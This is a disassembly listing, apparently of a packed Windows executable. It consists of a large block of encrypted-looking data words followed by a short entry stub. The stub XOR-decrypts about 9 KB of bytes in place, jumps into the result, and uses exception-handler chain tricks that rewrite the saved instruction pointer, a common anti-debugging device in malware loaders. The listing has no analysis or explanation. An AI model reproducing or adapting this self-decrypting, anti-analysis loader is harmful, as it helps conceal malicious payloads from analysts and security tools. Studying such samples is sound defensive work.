dd 0CBD51361h, 0B6EC2E7Ah, 7AA7D9B6h, 1E1A11CAh, 0A21F8008h
dd 8A603D6Ch, 1B31575Dh, 0E03991CBh, 556E2C93h, 0A595263h
dd 0DB343B7Dh, 202DA3A5h, 4D771A1Eh, 5331A7A7h, 6F47B65Dh
dd 6C7986CCh, 0E5BC11FDh, 87F41893h, 0FB1A7068h, 433D1581h
dd 0A8FE6EC5h, 0E5140A14h, 9F786370h, 37658B90h, 22C3A1C5h
dd 2749DCD3h, 5B6FAE41h, 0FBF2C0DCh, 0ADB0D621h, 65037F87h
dd 0AE5379F9h, 0A8AAB988h, 95DF7A86h, 0F597737Ah, 61F40858h
dd 1F39102Ah, 0C18F625h, 92C3832h, 457A653Ah, 0BDA2484Dh
dd 0BD4D5738h, 0FBC66B40h, 1865D739h, 90CFE599h, 3940463Eh
dd 0E1E91FB1h, 8A92B8BAh, 333B6164h, 0DBE40A0Dh, 7BDEE5E4h
dd 1D1D85CBh, 7986AE07h, 85FD6E2Bh, 7BF2B9BAh, 0AAA96143h
dd 1DEEC8E7h, 4B4E1D36h, 0B9A0999Eh, 1018F0F8h, 6E4F1A39h
dd 0A9CE8182h, 0D05E9ECh, 7B203229h, 0ACBA9A82h, 2A71F9FFh
dd 667B2531h, 0D7ABAE89h, 276BD0F0h, 79755F4Ch, 0DAD5A482h
dd 2F04C6F5h, 6F605D49h, 0C3F5DCA3h, 3F2BE4EEh, 60675C64h
dd 0EDC3A5B8h, 302B3C86h, 0AC675C4Eh, 0D3C4BCBDh, 223C2EE4h
dd 0F899424Fh, 0C0C3BE91h, 221B100Fh, 96997B56h, 0FED384CCh
dd 102F0414h, 849F7671h, 0A6ECAEA3h, 5F2B385Dh, 89866768h
dd 0F7D2BDB4h, 50141200h, 84886A60h, 0FDF7FFBAh, 57570825h
dd 0A8907E4Dh, 0F7F8D1DDh, 2C772F38h, 92AB6041h, 2EEDC2C7h
dd 26542D3Eh, 88AE6547h, 23E6C5C1h, 20493F38h, 84A09FBDh
dd 1E08C7CCh, 774F0A29h, 0A9AFBA90h, 2A77DCFBh, 796D3222h
dd 0DAA49B94h, 0C1FF6D1h, 115B252Eh, 0E9B68DACh, 61FE2EDh
dd 7E7D7E50h, 0DAC88183h, 5E24F2FDh, 537A517Fh, 0F6C6B184h
dd 173AE9E3h, 436D4352h, 0DFD591DCh, 24341AD1h, 9576497Eh
dd 0C3ECD196h, 3D312CF4h, 99924A5Ah, 0D4C38BD1h, 3A3D102Ch
dd 0B496714Ah, 0DDA186B3h, 2C1C0411h, 8E9E6C71h, 0FBFAAC8Ch
dd 4924061Ch, 0A4807B7Eh, 0FAF2FABFh, 532E0F3Fh, 9B9A787Eh
dd 0EBF7CAD0h, 48490E16h, 0B6884D0Bh, 0C3E1D2D1h, 48593030h
dd 0B2B04905h, 1EE1E2C9h, 5C433624h, 0AF94FFBEh, 12EBFED8h
dd 664D1E26h, 0C9B69593h, 1C19D2ECh, 7E49220Ah, 0B4BD92B8h
dd 2C11F2F7h, 736F0A47h, 0D0B5BD9Eh, 1B03F3FAh, 7E6B6F42h
dd 0C9B28288h, 0A2CA2A7h, 0C674A4Fh, 0D6D493B6h, 6D17F9EAh
dd 7F687D0Ah, 0D5E7DB95h, 3018E0EBh, 5107485Fh, 0C2E9A1B9h
dd 20191BE9h, 9F68555Ah, 0D5CFA4A2h, 2A0079C1h, 9B95645Dh
dd 0C9CA9BB4h, 3B2B0014h, 85924E23h, 0FFCCAF8Dh, 26240620h
dd 8E9E4B1Dh, 0C19BB1A0h, 4D250700h, 92887A41h, 0E7D0DAF0h
dd 613F0004h, 0AA9C7C78h, 0E4D0DBD8h, 31590F0Eh, 0AD8A7B5Ch
dd 0EEE5F4D6h, 5F7B5B39h, 0A6B46044h, 0ED7D9DEh, 4959203Fh
dd 0BDBD999Ah, 12EAC8FCh, 5464503Fh, 0A8B78AB9h, 1B3DC4D7h
dd 55242F20h, 0A1BEB181h, 3D10EFFFh, 737D2B35h, 0F1C69F83h
dd 0D1DD6EDh, 417D4A23h, 0DFA38999h, 1B2CFCE7h, 4F66763Dh
dd 0C1DB8594h, 3D06DAEAh, 69635B4Ch, 0FDC094E1h, 300BF3EBh
dd 64495B56h, 0DFCDB18Fh, 543912ECh, 8D4F5260h, 0CFEFA1B2h
dd 1521DECh, 928B6E5Dh, 0CFD69ABFh, 3A3E1619h, 949D7377h
dd 0EED1C5A5h, 2D2D1E3Bh, 9F92724Eh, 94F4AFACh, 4F131D20h
dd 86896678h, 0FCFCEDCBh, 5B5F111Ch, 0B08A685Ch, 0C690CFCBh
dd 544C0E16h, 0A0B17179h, 0EFEEC5C0h, 44523415h, 0A7BC6E77h
dd 7CE8C3C4h, 57782118h, 98B28996h, 2F4D4C1h, 45642330h
dd 0B0A39897h, 1E0EF2A3h
dd 784A2719h, 97AE959Ah, 31DE8EAh, 57721720h, 0ECAC989Eh
dd 607E6EDh, 42403D25h, 0DBCBB6AAh, 131DFAE6h, 637D543Dh
dd 0DACABA95h, 2A07E3ECh, 69645238h, 0C4D0BC8Fh, 2D39E58Ah
dd 7676445Bh, 0CAC3AABEh, 265619E8h, 0FC89464Bh, 0C1C6ABA5h
dd 2D3E047Fh, 0F68E4543h, 0FAD7A799h, 3C291C0Bh, 839A7761h
dd 0F7FF8CAFh, 42220117h, 8F847855h, 0E7FCD1B6h, 7F360D2Ah
dd 81857F79h, 0E9F1CEDDh, 425C1734h, 0B0AF0C75h, 0E9FDD0CCh
dd 40772A04h, 0D8A0696Fh, 0E4FEDEFBh, 5E563729h, 0BCB9724Bh
dd 3AE9D9F9h, 50401D55h, 0A8B88E9Bh, 171AF7D3h, 73410834h
dd 8C91F69Ch, 3829DEF4h, 5E0C7A78h, 91CABCB8h, 30FEF8h
dd 5E793129h, 0ECC4938Ah, 1722F4FDh, 755D5224h, 0F8C6A193h
dd 502DF93h, 7975436Dh, 0D8D9889Ch, 2524E2FBh, 63583076h
dd 0DBD78B87h, 2D37E0DFh, 407C6F57h, 0AF4551DBh, 3B04B3AFh
dd 13FE242Dh, 0A7838158h, 483A7614h, 9FAA4F76h, 0CE6E43CAh
dd 131BA5F3h, 0BDA55A4Bh, 5083C9Ah, 0C2465C5Eh, 7C1019DFh
dd 92A89266h, 0F849A3EFh, 4A6F9D42h, 0BF9389A8h, 35563299h
dd 481A0565h, 86BE98FEh, 0AB389DE5h, 0D7E00699h, 0E0DDC7E1h
dd 0FDB9585Ah, 1D500169h, 7AECEAC1h, 492D4354h, 0CCBFA9FFh
dd 751EF0CEh, 4F27274Fh, 5230A5ABh, 7048B22Ch, 8CDE1E15h
dd 0C2F9C43Eh, 37066719h, 19BCCCEh, 0B120E9DEh, 766C071Ah
dd 0DE163B70h, 6A42B0BEh, 4D1B0919h, 8582350Bh, 0B3B7C6DCh
dd 0A39FD265h, 948CA4C9h, 23B1E7F3h, 57410507h, 0FF40C131h
dd 2C202E25h, 52645602h, 0E171ACA1h, 914ECCD4h, 0C7B08A82h
dd 0C4D49BA3h, 0E96142CEh, 0DFC5FD7Ch, 6F3193Bh, 68633DD5h
dd 831AACFAh, 0E8EEFC4Fh, 10CABDC2h, 0A5AE086h, 6F203C14h
dd 0BBB25839h, 656F3065h, 8DB55A5Fh, 0A98C2649h, 2AB15C6Fh
dd 1B4AFA2Ch, 22889E9Bh, 7D31539Bh, 0D0DA00EAh, 9402F4AAh
dd 221C48E6h, 5E590596h, 744DB925h, 3DEB1E1Eh, 0C6E4F4D3h
dd 97B5923h, 2E6C38Eh, 0E105EEC2h, 70B9125Ch, 133E4074h
dd 7F9FE8C7h, 640190FCh, 7DEB09C0h, 32A91DECh, 895FF51h
dd 90E3431h, 0B1ED0C68h, 0EED2B9DCh, 43834D1h, 0ACBC6C55h
dd 0DCD27F87h, 0FF022938h, 638029DAh, 0A29FF1E2h, 0FC89428Dh
dd 49532E94h, 4488F6BEh, 0A02C9572h, 0C8F10B46h, 171B301Ch
dd 780CE675h, 96ACEE5Ah, 0B449AFF3h, 0D7C21D8Ch, 134096C1h
dd 3E876180h, 0E1010F79h, 4991EF32h, 1FCCF40Dh, 5FE10A3Dh
dd 44BEBBBDh, 0A42CEC1Ch, 0E5F3F292h, 0F36A59AFh, 0D99B361Ah
dd 0C3B75C8h, 788341FCh, 0A0715252h, 0FACF8C16h, 88E028A4h
dd 9F267C61h, 0C5C6D08Ah, 6ECE1990h, 0FBA14648h, 0C0C8ECF9h
dd 6875FFCEh, 87E54043h, 0BBF2C4C5h, 0E0E66D1Eh, 0D153E1Ah
dd 0B6D6B2E7h, 5F658F78h, 5C5C6239h, 24498BE2h, 5A6FA9AEh
dd 9485E707h, 0ACB0D7D9h, 57332ED7h, 9603427Eh, 0E7ABD1D8h
dd 0A1C185D3h, 6EFD1301h, 0FAD23A57h, 4E27212Bh, 0A5F81E25h
dd 0BB857333h, 0BB4A7077h, 0DCDFC08Bh, 55199BC6h, 2AA67D1Bh
dd 8C3A9F48h, 0D8C6EFC0h, 4DD5993Fh, 0B9E93F3Eh, 59E7783Fh
dd 0FFAE9E35h, 57E43A27h, 0D4DFF7E3h, 0A16E1837h, 0D4DE0191h
dd 0BDBB05AEh, 0D568473Dh, 9E8A50ABh, 27D3F9F8h, 0D9B9AD03h
dd 48D4CAD1h, 727FAB67h, 3F52B34Ch, 0D5B0BFDh, 3E77ADB2h
dd 3AE9D3B8h, 7D95EEC0h, 56F1979Dh, 571B3548h, 0AFBE6560h
dd 7A8891A4h, 1C14AFB0h, 64BFE2D6h, 0DAB774D9h, 0F8863BF8h
dd 0BFB6DCE1h, 595F750Eh, 3836AE33h, 2BF6C6A9h, 0D0567FBBh
dd 0FD0228CFh, 0D38BEF57h, 71D53C71h, 0B0B36A79h, 6F2DEEA4h
dd 64E33BCh, 9BA9D008h, 0C9F796CBh, 6F8BE58Bh, 0D0AA192Dh
dd 2B19CD04h, 0D4456B6Eh, 0E5EE14A6h, 0DCC7833Eh, 0B24F3021h
dd 0DFE90FB4h, 249A7E3Ah, 0B5346C5Eh, 0D9E40A92h, 71F8938Fh
dd 240C60F0h, 0D3DF8980h, 5C8503ADh, 18117776h, 0BABC98DEh
dd 4B2ED7DDh, 0A1572471h, 0A1F30684h, 309D6D7h, 6B2635CDh
dd 0B1E2DCCFh, 92315AF6h, 0AC2E4A47h, 0BFC7CAE0h, 9722746Eh
dd 213556D7h, 0EA01D4EBh, 8B3AC0C4h, 0C133934h, 0DBCC8EA2h
dd 3A05E5E3h, 0D698CC38h, 35B5EBCDh, 6A68F04Ah, 0F982A4FAh
dd 0FAAFE5F0h, 545B7EEDh, 0AB5076AAh, 733F2F87h, 0C25349ACh
dd 0C7E752BCh, 69969BD1h, 1B1E252Eh, 64084C72h, 9A90EACAh
dd 0BC6D6BF3h, 0DBD9D588h, 145839C5h, 0D5105E3h, 26141217h
dd 8AB2E034h, 373F6580h, 32695311h, 88A1AAC4h, 179DDE9h
dd 6C68093Bh, 82BC82F8h, 0A6BEA05Fh, 0D3EE3442h, 0F90C085Eh
dd 25006615h, 0FEE76B74h, 0F282A798h, 201A6066h, 41BAFA73h
dd 8D7BA1B0h, 2B0823D9h, 980519F5h, 403FEDAh, 46422124h
dd 0D6B59598h, 2503F4FAh, 63775327h, 68F3E692h, 953B401Fh
dd 0ED916AE4h, 0B6FA8AE5h, 3431DE76h, 0BCB9BF20h, 9B4EAFCh
dd 595D839Dh, 0FC4B28BEh, 0CD512B23h, 1953F02Eh, 0FD00262Eh
dd 0E12464B1h, 0AB60D384h, 15504785h, 9331472Ah, 1D4D434Ah
dd 0EA41A49h, 0AAB35C5Eh, 673CE574h, 0F3359415h, 11950040h
dd 3D4368CBh, 0C584127Dh, 0D895BBBEh, 0A2C16F02h, 0DFD721B0h
dd 39CE832h, 0ACB04F2Ch, 0D9D2383Ch, 0B2B03C3Ah, 0C8B55A6Ch
dd 0DC22F305h, 7CECFFFCh, 90D0533Ch, 0CEE7CDCCh, 5BC53357h
dd 0DF794F61h, 0F9E1C44Fh, 0BFEF5FA3h, 43237967h, 0CB583170h
dd 6D75CE1Ah, 2D9C2547h, 0B3B1B1BDh, 5FB6BCAh, 0F8170D6Eh
dd 0BABFE4AAh, 63A03019h, 0BB1E373Dh, 0C134C1A8h, 5A0A97BEh
dd 500B3139h, 9C924C1Eh, 0E0A82BAh, 29ECBECCh, 0E826D3ECh
dd 0DF957FB9h, 2FFC5D7Eh, 2E88BC5Dh, 7ADC6F35h, 0F557711Bh
dd 9EDB4813h, 3A29211Ch, 2171E56h, 0B0332F93h, 30CC497Fh
dd 19F34F38h, 9C85ED4Fh, 3F0C6CDAh, 66DF9AC5h, 0C31F49BDh
dd 988EA6Fh, 55E63C20h, 0B03A8E8Eh, 42386E51h, 0EF542C89h
dd 0BA8A8082h, 1A0362EEh, 0A35F0D04h, 487A5453h, 679BDD95h
dd 44D6CCCEh, 464FE22Ah, 75781E50h, 0C9BAA6FAh, 71799FCAh
dd 9FDD1FCBh, 0C3FAE58Ch, 47820C62h, 98E34276h, 0BEF4FF97h
dd 68926B1Bh, 0EFE907C5h, 8A3B6D15h, 867BDA3h, 5D105C3Ch
dd 0D52D21B5h, 0D661B7A2h, 363A77B2h, 0AD5219E0h, 5831D1D9h
dd 2D39BFCDh, 2F25D2EBh, 53654BCFh, 0FB94F0A6h, 0F4953287h
dd 7D63C381h, 60061F17h, 9E92E496h, 7778F4F3h, 0EB7D1A11h
dd 55083CEDh, 0CA465C59h, 5C642948h, 92A88E88h, 0F5B33E7h
dd 76C1EE9Eh, 8CA3898Ah, 57BEFEDh, 0F6480B3Fh, 7C6C1F75h
dd 3243D8EDh, 86B10639h, 0D1D8FFE2h, 533CDA5h, 2E8B0133h
dd 4AAF673Eh, 50089054h, 0A9EFD1C7h, 191CC5C8h, 5E1D292Ah
dd 0ABAA9D8Bh, 5E4AADCDh, 354D2B2Eh, 91C9DEDEh, 2E26CBC5h
dd 61581D08h, 0D3A69B9Ch, 803D1E3h, 637A4934h, 0E4C986BAh
dd 1714E9C1h, 796A5652h, 0D2DF8EB8h, 1D04E3FFh, 766C4C55h
dd 0CFE18BACh, 3237E1FAh, 73714C45h, 0DBC29786h, 3E350DE6h
dd 96927340h, 0FFDFAFBDh, 222E012Eh, 908A7F42h, 0FBCEB59Eh
dd 1A2F1C1Eh, 86876C61h, 0EDF5B0A7h, 30040F14h, 8B87786Ah
dd 0FEFEC9A3h, 761C1505h, 0E29D7C7Dh, 0DFD4F7EFh, 71692032h
dd 0BF8D4752h, 0EAFEDCC4h, 796A2839h, 0B9BB6B61h, 3CD4DDC7h
dd 4D43252Ch, 0B58C746Ch, 16EADAD8h, 5A690E3Dh, 0B9BB968Ch
dd 207DD1C0h, 78413E2Fh
dd 0B5A1BC83h, 6F759DD4h, 5C731649h, 0B3B8E8E2h, 718EFF4h
dd 786E2E6Ah, 0CCAE869Fh, 0B02BFF7h, 40145559h, 97F7A1A1h
dd 1306E8E6h, 7B745250h, 0F7E589E9h, 112AA5DEh, 2446677Ah
dd 0DFD9A0F8h, 5C6A0AF3h, 0FF02C065h, 29F6D1D9h, 61749C6Fh
dd 9678E52Bh, 0A2A6FCC6h, 6762E083h, 1B391E15h, 0F6F0B3D2h
dd 0A4FFFB68h, 0B4F32934h, 0E3B2FE6Bh, 1C40D5Ah, 0C49B09E6h
dd 0BC66004Ch, 4FCB665Ah, 874C5811h, 8417351Eh, 0BC3B514Fh
dd 0EBCF3E88h, 0C20449B5h, 0D378D0A4h, 37DEB4FCh, 813D2360h
dd 4F316774h, 0CFDA0105h, 411656FFh, 0C82C627Eh, 0CAD4FA72h
dd 66D42629h, 76764C7Dh, 3AC09EF6h, 5E5BD40Ah, 335CC548h
dd 0B1BDEAF9h, 69719F72h, 515C1343h, 0F78EACC2h, 79FE6E95h
dd 6140A12h, 0DCA89627h, 378DDB92h, 0F7F1CBC0h, 819D0577h
dd 2E9F008Bh, 0EBD8D136h, 0ACB0D6D6h, 0A1A39D5h, 0BA2C7B60h
dd 58AB9D94h, 60786714h, 1BCCB2Ah, 142B332Dh, 4A7F5984h
dd 0F2F91A4Ch, 0E5E91CCh, 447A5C54h, 0ECF314F6h, 0C7D89EC6h
dd 6C003D26h, 0B2AB484Bh, 70C1BD83h, 86B8FFCh, 0E0EEE712h
dd 0C1CEB8BAh, 616F322Ch, 4F1B5C0Ch, 83BD985Dh, 7D67956Eh
dd 0BE8E066Ch, 7D88C6AFh, 0D9671757h, 0FEF1F195h, 887B2AA8h
dd 0AD7C7125h, 0F9F8056Fh, 0E9F02EA3h, 71267C6Bh, 0DEA6A6F5h
dd 3C779D9Eh, 63B5B917h, 40C8DEDCh, 585A5A0Ch, 1111A842h
dd 0E997E8EBh, 5158C3D1h, 40587E13h, 0F4291DE6h, 0B665BBA3h
dd 70E3432h, 0C2C6AF96h, 3F2BEBE3h, 0FD582E72h, 9B9B0F49h
dd 0B1DCF685h, 0F2021805h, 0F4265CE6h, 0C6544A99h, 0C7D1D4ACh
dd 35599DD1h, 497F593Bh, 0F1FC76B0h, 2F2CC7CBh, 437A692Bh
dd 364E9444h, 7C9CF2E9h, 0C2BA9992h, 416BD371h, 8E978D9Fh
dd 91E5E538h, 0DFE93F31h, 0A8F62D34h, 656B6152h, 0D98E0B61h
dd 828FDBE1h, 0BEC9DC5Ch, 0D3EF29E4h, 9D26E28h, 0B2BCDA74h
dd 9CD9CFDFh, 0C20FAEC2h, 201B71F5h, 9983AFAEh, 0E783F0F2h
dd 1B1567A9h, 19580CADh, 0AB76ACB2h, 2631BBC2h, 0D12FEDF0h
dd 978F696Bh, 210B42CFh, 0F64420EBh, 356AA081h, 0E4206669h
dd 4A4413BFh, 4B280F48h, 535B3308h, 0FA5DEFBEh, 9EA17B78h
dd 321261B6h, 0F4D783DCh, 0A66396B1h, 78C6D8D1h, 0A69AC59Bh
dd 1B251CD6h, 7271EB1Ah, 0A095FB9Eh, 181F252Bh, 0A0A64C73h
dd 0B6955334h, 0D6B66F44h, 0EBC23430h, 0E1842904h, 3D48821Ah
dd 0ADBE1317h, 0DED7EBF3h, 7B7B4B21h, 4A170E5Dh, 88A19BF8h
dd 313A6C8Ah, 8AAB5A0Bh, 0E3DAC6D6h, 6A502E30h, 46215405h
dd 7CB78674h, 0DA85DBC5h, 0A6D8CED3h, 7781A760h, 0DF2A3A07h
dd 0F9FEE16Fh, 0A0EE2CA3h, 96247A53h, 0F4E13548h, 3A27CD9Eh
dd 3DFBD1B8h, 7B45ECC0h, 87FA1895h, 41180E5Dh, 0ECC18CBCh
dd 636BE7C6h, 0DFEDB83Dh, 4A40FD0Eh, 6CDE0A70h, 70C022Dh
dd 38DCD195h, 0A65D8399h, 322A45A6h, 0ABA23CDCh, 7007D85h
dd 0CE4B6561h, 0EAEDE1E5h, 0DAAD78CCh, 0F7CB0D68h, 0A0A3A242h
dd 0FCC0737Ah, 0F1C60495h, 37224892h, 0AB485E58h, 140EE691h
dd 949ACC2Dh, 730A3E6Eh, 0B1A95C5Eh, 0C2D9FF91h, 76AB9B68h
dd 5AE73D3Dh, 0BD14B979h, 0A2395F60h, 0D9E20D63h, 763E3CB3h
dd 72346A44h, 0FF14BE88h, 296EAC9Dh, 0A6D0AAA7h, 0FEFB3042h
dd 0F38FA6A8h, 20294D41h, 0C8411B7Bh, 1A2EA0A3h, 1B23484Dh
dd 0E866640Ah, 0A9F59AAEh, 161D42D7h, 0D51160A0h, 0FD91C699h
dd 1127118Fh, 0CFE6256Eh, 70E0E699h, 99EE373Dh, 0B589F38Fh
dd 0E3E16A64h, 73B119Eh, 3D9AACE1h, 697C280Fh, 97FA7B33h
dd 0AB9DFF65h, 0D059BC00h, 0FCFF24A7h, 2EA48E5Dh, 0C161887Fh
dd 0C6DA86ADh, 61260FD0h, 494C4257h, 0F19F1B48h, 0C61C6A0h
dd 427741B6h, 0E50FEE9Fh, 9398DF40h, 0A9CFFB6Dh, 0E4DB31B4h
dd 0DEC6AAD4h, 1A88F698h, 1E630C20h, 86CF30B7h, 8DB55E61h
dd 0D8D127CEh, 0F062B803h, 42CCA6ADh, 0D2DC0290h, 0F26380F2h
dd 0DB7A7061h, 0FDFACD6Bh, 0A4C228A7h, 0AE287E70h, 3E821EF8h
dd 0E4F4605Dh, 1A1268F4h, 0D7A2F09Eh, 3E73999Dh, 0D489BD15h
dd 33C4DAC3h, 0EA79B7DCh, 202673D4h, 0FB1B4EAh, 46230699h
dd 3F0F728h, 0A6B994E7h, 177385C4h, 224E3B34h, 0A05358E8h
dd 9536148h, 11206E39h, 27FCE024h, 63798439h, 0FBE2CC2Dh
dd 8A82CDD5h, 63700E48h, 0CFD93107h, 0B087EDEAh, 3F6E0940h
dd 0E5873F01h, 0D6D48C83h, 0BE116C52h, 0D9C4F08Eh, 3E5C3FC3h
dd 5141676Ch, 0B0BD4015h, 0A0522C42h, 0B8B76256h, 0DDD51E3Dh
dd 9D6DB4DDh, 7E3A940Bh, 0D7E003E1h, 0E4AC89B1h, 0D6655850h
dd 0E1F0E496h, 764029ABh, 4B26B804h, 0CCD5FBF5h, 55A6192Bh
dd 4D704D7Fh, 0EB0E6007h, 0B0FD9E91h, 0ACAC1334h, 0C2F9C30Ch
dd 7E403D1Fh, 991B4175h, 8DED1763h, 0CA2B997h, 5C436A40h
dd 94007616h, 99E58CA2h, 9B204B3Bh, 63A236Fh, 5C50AA72h
dd 0ABFB2286h, 46D1C7AAh, 0A8A576D2h, 0E3145B50h, 0A8DC5CD3h
dd 9DDF9068h, 4770ED07h, 0A396E02Bh, 0BBC8D18Eh, 0BABA7CDh
dd 0AD8D765Bh, 29F7F077h, 0EFF32935h, 0A7F4E8BCh, 0BF456B04h
dd 0D8C27D8Fh, 6F2A3DC2h, 3A405645h, 672E1E60h, 8BA2981Ah
dd 343B6165h, 0F21A8FC8h, 6C8DB386h, 0D1C9A257h, 0D6DBC755h
dd 51771B3Dh, 0D7675769h, 0E0F60D97h, 867B2AAAh, 2297D65Ch
dd 4E5DFAFCh, 744D93A6h, 0E2704C24h, 0F6E2A962h, 60B718A0h
dd 1820E2CDh, 9108C5F2h, 3A72FDCBh, 1372412Eh, 0EA02E8EDh
dd 4E9A0469h, 0F6973A0Fh, 8538ED17h, 0E9658B95h, 393E33BFh
dd 0B93B51E3h, 0D65FB5BCh, 34383DA0h, 0C7E287DEh, 0C3A62F87h
dd 0FF320425h, 0A754295Ah, 51507A06h, 6FD492Bh, 9296CB66h
dd 5ADA8A7Ch, 70F82E09h, 18AE3835h, 454A739Fh, 0DDE89C96h
dd 5FAFC2F7h, 6F14A873h, 0B6EA7E48h, 0A090083Eh, 0ACBF665Ah
dd 0E1D924E6h, 0E9D783Eh, 333B62A1h, 5E6DC33Eh, 84BD83AAh
dd 45670D0Fh, 0D5D00518h, 3B1D51FFh, 0A2316774h, 0B15E0FC1h
dd 0F183A9AAh, 111C71D7h, 815F39FBh, 132E1B9Ch, 0CE154C4Dh
dd 343935F5h, 0EBFE7C68h, 17107667h, 78F4A57Ah, 69718C56h
dd 0D3199270h, 5A35191Bh, 544C141Ch, 2D73A0Eh, 4FBAA950h
dd 0CE8BD73h, 4BB93B21h, 0F866DFF6h, 597744E0h, 5C32AFE4h
dd 55DEBFAAh, 0D61061F2h, 8C032455h, 9BE05A07h, 5340380Ah
dd 0BC703368h, 7851339Ah, 0CF74B458h, 0F2C82E3Fh, 0DF2A9E0Fh
dd 0CCC37C51h, 0ECF319A6h, 0A45F02F5h, 0E6B5C5Dh, 0D7C02436h
dd 0C4E3F3E0h, 482C081Bh, 8E802173h, 839FD7DCh, 54525D40h
dd 0BF896B7Eh, 0E0FFC094h, 585E7E60h, 0FBE57572h, 36FCE081h
dd 565D3925h, 0A0B32E61h, 5ACC6CEh, 49137D32h, 0E9F6CBC7h
dd 619CAD4h, 3B177124h, 0A3A7919Dh, 5C4AE9F6h, 6F543567h
dd 9DF58B9Ch, 0C03F8FBh, 21203227h, 95FED6C9h, 219F7FDh
dd 12A5F50h, 3E4269ECh, 6E559002h, 84408438h, 1E44D808h
dd 66DE8CFFh, 6C7A6547h, 207322A9h, 4FD4F47Bh, 4D02181Eh
dd 0A34252EBh, 0A121D472h, 82D21CA9h, 0A1E14726h, 9690AA5Fh
dd 0BEBA23FCh, 72D49E8Fh, 0ABB45B3Bh, 0EBF31B31h, 949C9AADh
dd 0CCAD306Eh, 9111EBEAh, 951A369Fh, 0BA405658h, 10C20E25h
dd 0BBAE35F7h, 0B69F929Fh, 0D89A87D2h, 0A538063Eh, 0D8CA5C6Ch
dd 1C54C6A1h, 0C105A546h, 250179A9h, 0FD067403h, 16BE0461h
dd 5A175723h, 0E9FFFB8Dh
dd 6209E09h, 6F0B77A0h, 0B1CDCF28h, 0E64B7F76h, 459A8346h
dd 0BFC7DDC0h, 2D28D3A4h, 2C2B4B42h, 0BA93A4B8h, 9C4FBBE0h
dd 3113C6C2h, 0B5F6B5AEh, 0E5998FBh, 730D6370h, 0E3F4E6EAh
dd 0DC5184DAh, 0FDF8D372h, 9BFC5022h, 67B37EB5h, 2FFB8C7h
dd 9BA95B28h, 0C1D30D7h, 9DBA626h, 0F798342Eh, 46002139h
dd 0E0901A7h, 0D9F7FB34h, 0C7465D47h, 140DE60Ch, 0C0C891F8h
dd 3BC06521h, 0D612ECE9h, 73B85464h, 0B3309A97h, 2017F3E8h
dd 9E79658Ah, 0D93A6062h, 261CF752h, 828CB25Bh, 0C6B4065Ch
dd 0D3EE2D3Ch, 7C869F44h, 17CF3256h, 0FEFB4B74h, 0FEE5A798h
dd 7397D073h, 0C8D2C8CAh, 0DC93ABD6h, 0F2DBB5B2h, 0C4CCF3E6h
dd 204B1AF8h, 1E9B4B1Dh, 34C6ECF1h, 0B66CA9C7h, 4123BF24h
dd 4245E9AEh, 94698F94h, 2C122E7Eh, 30B5E0E6h, 5E638964h
dd 55071CEh, 0B0555EEEh, 27DC838Ah, 22260C13h, 7F2ADBFCh
dd 0BC577D85h, 2FFDB89h, 0A6604DD8h, 0DD97880h, 0E7B1AA21h
dd 0A4D70BFAh, 4CA6B349h, 0BB7FD420h, 0B11A4CDBh, 0AB485E44h
dd 140EEA4Bh, 949A6F2Dh, 1ADEE26Eh, 0E6EC2227h, 0BEA59022h
dd 0CB508C68h, 5BE8F2EEh, 8890B636h, 11AEAE9h, 8769083Bh
dd 6A55B28Fh, 0D4CBA70Bh, 995C7E77h, 7C86CC89h, 73D1DEB6h
dd 43C387FCh, 4790A61Dh, 30534C51h, 0C9D70443h, 0D789F7A3h
dd 19C048FDh, 9A945506h, 0FF4595CCh, 169FC4CAh, 36A3EBF0h
dd 97910F09h, 0F4C7D5BDh, 31E51A14h, 296B82DEh, 0A50BA2Dh
dd 3C919CCDh, 5E62D708h, 274DF638h, 9093F9C1h, 0D274C903h
dd 878E3B79h, 0AB9DE3FBh, 275E36BCh, 0F4B5AC2Dh, 26B88CD7h
dd 0C5512F1Ch, 0C6CA0FADh, 97E1C8D0h, 7B1C3178h, 0D27E7FF0h
dd 0C19C4BAEh, 7240D0F0h, 0E5F0162Ch, 6C652B40h, 1FF79792h
dd 1BEB2126h, 0BDB8D72Bh, 29889C67h, 21E63C20h, 0B7A4782Dh
dd 3BB5D361h, 55E1373Ah, 0B1BAA327h, 4061085Bh, 0D569FD04h
dd 84859B9Ch, 140231C0h, 0CA6303FEh, 897F9597h, 2F0383C5h
dd 37657BF9h, 8E79AF8Ch, 2A124BFEh, 5635A6F4h, 6C43B5C0h
dd 251BE7C5h, 7DC4EADFh, 676D9370h, 117C6141h, 9353096Bh
dd 923F8DA3h, 7395F733h, 31B8EEF0h, 95E2444Eh, 0C705C0C8h
dd 9FA7A065h, 48664289h, 74040032h, 0D62DB4C7h, 223977A0h
dd 139E3758h, 5B583211h, 16B8730Bh, 1D06E0DAh, 615D371Dh
dd 6AB45F19h, 0FDC04C59h, 989DE671h, 0E4AE0C72h, 9C10EAE4h
dd 0B6DC35FAh, 0C4F4EA5Ch, 68EA203Bh, 0DF5B1EDh, 463E645Ch
dd 0DD8D5D2Ah, 0D8E4BB7h, 7D3737A4h, 7E75F959h, 3899F9Dh
dd 17B3509Eh, 8DE43E5Fh, 0BC07A9DEh, 0DE25BB50h, 0B33D0402h
dd 14815B59h, 1E53F58Ch, 7624F5F8h, 7078B119h, 1931AF4Ah
dd 0E20BEFF3h, 6B42209Ch, 17F34145h, 7FC3E9EEh, 32E192B3h
dd 21D83764h, 0C4BD1B6Ah, 618EEC8Bh, 810F353Bh, 0EE87F9B0h
dd 0B1E19C06h, 5390481h, 515FD037h, 5398E177h, 150Dh dup(0)
assume ds:_text
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
public start
start proc near
push ebp
mov ebp, esp
call sub_435017
call sub_435055
push dword ptr fs:0
pop ebp
lea ebp, [ebp+8]
start endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_435017 proc near ; CODE XREF: start+3�p
sub edx, edx
sub ecx, ecx
mov cl, 0ADh
loc_43501D: ; CODE XREF: sub_435017+7�j
inc edx
loop loc_43501D
call $+5
pop ecx
add ecx, 3Dh
sub esi, esi
xor esi, 243Ch
push ecx
loc_435035: ; CODE XREF: sub_435017+2C�j
mov al, [ecx]
xor ax, dx
mov [ecx], al
inc ecx
sub esi, 1
cmp esi, 0
jnz short loc_435035
pop ecx
mov esp, fs:0
pop dword ptr fs:0
leave
jmp ecx
sub_435017 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_435055 proc near ; CODE XREF: start+8�p
arg_C = dword ptr 10h
mov eax, [esp+arg_C]
pop dword ptr [eax+0B8h]
xor eax, eax
retn
sub_435055 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
